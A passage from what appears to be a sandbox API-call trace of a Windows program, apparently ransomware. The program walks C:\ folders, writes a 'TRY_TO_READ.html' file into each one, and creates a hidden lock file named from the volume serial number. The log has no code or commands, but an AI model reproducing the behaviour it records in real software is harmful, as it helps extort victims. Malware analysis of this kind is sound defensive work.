(HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca40 [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca18 [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca68 [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447b68 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447b68 | out: hHeap=0x410000) returned 1 [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca90 [0064.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca90 | out: hHeap=0x410000) returned 1 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca68 | out: hHeap=0x410000) returned 1 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca18 | out: hHeap=0x410000) returned 1 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca40 | out: hHeap=0x410000) returned 1 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0064.977] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0064.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.978] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.978] GetLastError () returned 0x0 [0064.978] SetLastError (dwErrCode=0x0) [0064.978] GetLastError () returned 0x0 [0064.978] SetLastError (dwErrCode=0x0) [0064.978] GetLastError () returned 0x0 [0064.978] SetLastError (dwErrCode=0x0) [0064.978] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca40 [0064.980] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca18 [0064.980] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca40 | out: hHeap=0x410000) returned 1 [0064.980] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca18 | out: hHeap=0x410000) returned 1 [0064.980] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca18 [0064.980] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca40 [0064.980] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca68 [0064.980] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466588 [0064.980] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466598 [0064.980] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.981] GetLastError () returned 0x0 [0064.981] SetLastError (dwErrCode=0x0) [0064.981] GetLastError () returned 0x0 [0064.981] SetLastError (dwErrCode=0x0) [0064.981] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0064.981] CreateFileW (lpFileName="C:\\\\Recovery\\TRY_TO_READ.html" (normalized: "c:\\recovery\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0064.982] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0064.982] WriteFile (in: hFile=0x3d4, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0064.982] WriteFile (in: hFile=0x3d4, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0064.983] WriteFile (in: hFile=0x3d4, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0064.983] CloseHandle (hObject=0x3d4) returned 1 [0064.983] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.983] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466598 | out: hHeap=0x410000) returned 1 [0064.983] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466588 | out: hHeap=0x410000) returned 1 [0064.983] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca68 | out: hHeap=0x410000) returned 1 [0064.983] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x27bccc70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x27bccc70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0064.983] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.983] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.983] GetLastError () returned 0x0 [0064.983] SetLastError (dwErrCode=0x0) [0064.983] GetLastError () returned 0x0 [0064.983] SetLastError (dwErrCode=0x0) [0064.983] GetLastError () returned 0x0 [0064.983] SetLastError (dwErrCode=0x0) [0064.983] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.983] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0064.983] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.983] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0064.983] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0064.983] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca68 [0064.983] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.983] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466588 [0064.983] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466598 [0064.983] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0064.983] GetLastError () returned 0x0 [0064.984] SetLastError (dwErrCode=0x0) [0064.984] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0064.984] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0064.984] GetLastError () returned 0x0 [0064.984] SetLastError (dwErrCode=0x0) [0064.984] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x472550 [0064.984] CreateFileW (lpFileName="C:\\\\System Volume Information\\TRY_TO_READ.html" (normalized: "c:\\system volume information\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.984] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472550 | out: hHeap=0x410000) returned 1 [0064.984] CloseHandle (hObject=0xffffffff) returned 0 [0064.984] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0064.984] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466598 | out: hHeap=0x410000) returned 1 [0064.984] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466588 | out: hHeap=0x410000) returned 1 [0064.984] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.984] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0064.984] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.984] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.984] GetLastError () returned 0x6 [0064.984] SetLastError (dwErrCode=0x6) [0064.984] GetLastError () returned 0x6 [0064.984] SetLastError (dwErrCode=0x6) [0064.984] GetLastError () returned 0x6 [0064.984] SetLastError (dwErrCode=0x6) [0064.984] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca90 [0064.984] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cab8 [0064.984] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cae0 [0064.984] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466588 [0064.984] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466598 [0064.985] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.985] GetLastError () returned 0x6 [0064.985] SetLastError (dwErrCode=0x6) [0064.985] GetLastError () returned 0x6 [0064.985] SetLastError (dwErrCode=0x6) [0064.985] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0064.985] CreateFileW (lpFileName="C:\\\\Users\\TRY_TO_READ.html" (normalized: "c:\\users\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0064.986] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0064.986] WriteFile (in: hFile=0x3d4, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0064.986] WriteFile (in: hFile=0x3d4, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0064.986] WriteFile (in: hFile=0x3d4, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0064.986] CloseHandle (hObject=0x3d4) returned 1 [0064.987] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.987] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466598 | out: hHeap=0x410000) returned 1 [0064.987] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466588 | out: hHeap=0x410000) returned 1 [0064.987] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cae0 | out: hHeap=0x410000) returned 1 [0064.987] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x26ab0e50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x26ab0e50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0064.987] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.987] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.987] GetLastError () returned 0xb7 [0064.987] SetLastError (dwErrCode=0xb7) [0064.987] GetLastError () returned 0xb7 [0064.987] SetLastError (dwErrCode=0xb7) [0064.987] GetLastError () returned 0xb7 [0064.987] SetLastError (dwErrCode=0xb7) [0064.987] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0064.987] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0064.987] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0064.987] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cae0 [0064.987] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447b68 [0064.987] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447b68 | out: hHeap=0x410000) returned 1 [0064.987] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0064.987] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0064.987] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cae0 | out: hHeap=0x410000) returned 1 [0064.987] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0064.987] FindNextFileW (in: hFindFile=0x447368, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x26ab0e50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x26ab0e50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0064.987] CloseHandle (hObject=0x3cc) returned 1 [0064.987] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0064.987] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0064.988] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x4, wMilliseconds=0x274)) [0064.988] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0064.988] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0064.988] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0064.988] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\$Recycle.Bin9c354ca09c354b444c.lock") returned 39 [0064.988] CreateFileW (lpFileName="C:\\\\$Recycle.Bin9c354ca09c354b444c.lock" (normalized: "c:\\$recycle.bin9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0064.988] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.988] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.989] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0064.989] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0064.989] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x471fd8 | out: hHeap=0x410000) returned 1 [0064.989] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.Bin\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3064ec90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3064ec90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447b68 [0064.989] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.989] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.989] GetLastError () returned 0x0 [0064.989] SetLastError (dwErrCode=0x0) [0064.989] GetLastError () returned 0x0 [0064.989] SetLastError (dwErrCode=0x0) [0064.989] GetLastError () returned 0x0 [0064.989] SetLastError (dwErrCode=0x0) [0064.989] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0064.989] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0064.989] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0064.989] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471fd8 [0064.989] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447ba8 [0064.989] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447ba8 | out: hHeap=0x410000) returned 1 [0064.989] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0064.989] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0064.989] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x471fd8 | out: hHeap=0x410000) returned 1 [0064.989] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0064.989] FindNextFileW (in: hFindFile=0x447b68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3064ec90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3064ec90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.990] GetLastError () returned 0x0 [0064.990] SetLastError (dwErrCode=0x0) [0064.990] GetLastError () returned 0x0 [0064.990] SetLastError (dwErrCode=0x0) [0064.990] GetLastError () returned 0x0 [0064.990] SetLastError (dwErrCode=0x0) [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0064.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471fd8 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447ba8 [0064.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447ba8 | out: hHeap=0x410000) returned 1 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0064.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0064.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x471fd8 | out: hHeap=0x410000) returned 1 [0064.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0064.990] FindNextFileW (in: hFindFile=0x447b68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0064.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.990] GetLastError () returned 0x0 [0064.990] SetLastError (dwErrCode=0x0) [0064.990] GetLastError () returned 0x0 [0064.990] SetLastError (dwErrCode=0x0) [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0064.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.990] GetLastError () returned 0x0 [0064.990] SetLastError (dwErrCode=0x0) [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x472550 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x461a20 [0064.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472550 | out: hHeap=0x410000) returned 1 [0064.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461a20 | out: hHeap=0x410000) returned 1 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471fd8 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458280 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466588 [0064.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466598 [0064.991] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.991] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458308 [0064.991] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.991] GetLastError () returned 0x0 [0064.991] SetLastError (dwErrCode=0x0) [0064.991] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0064.991] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458308 | out: hHeap=0x410000) returned 1 [0064.991] GetLastError () returned 0x0 [0064.991] SetLastError (dwErrCode=0x0) [0064.991] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473050 [0064.991] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\TRY_TO_READ.html" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0064.991] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0064.991] WriteFile (in: hFile=0x3d8, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0064.992] WriteFile (in: hFile=0x3d8, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0064.992] WriteFile (in: hFile=0x3d8, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0064.992] CloseHandle (hObject=0x3d8) returned 1 [0064.993] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0064.993] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466598 | out: hHeap=0x410000) returned 1 [0064.993] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466588 | out: hHeap=0x410000) returned 1 [0064.993] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458280 | out: hHeap=0x410000) returned 1 [0064.993] FindNextFileW (in: hFindFile=0x447b68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3064ec90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3064ec90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3064ec90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0064.993] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0064.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.993] GetLastError () returned 0x0 [0064.993] SetLastError 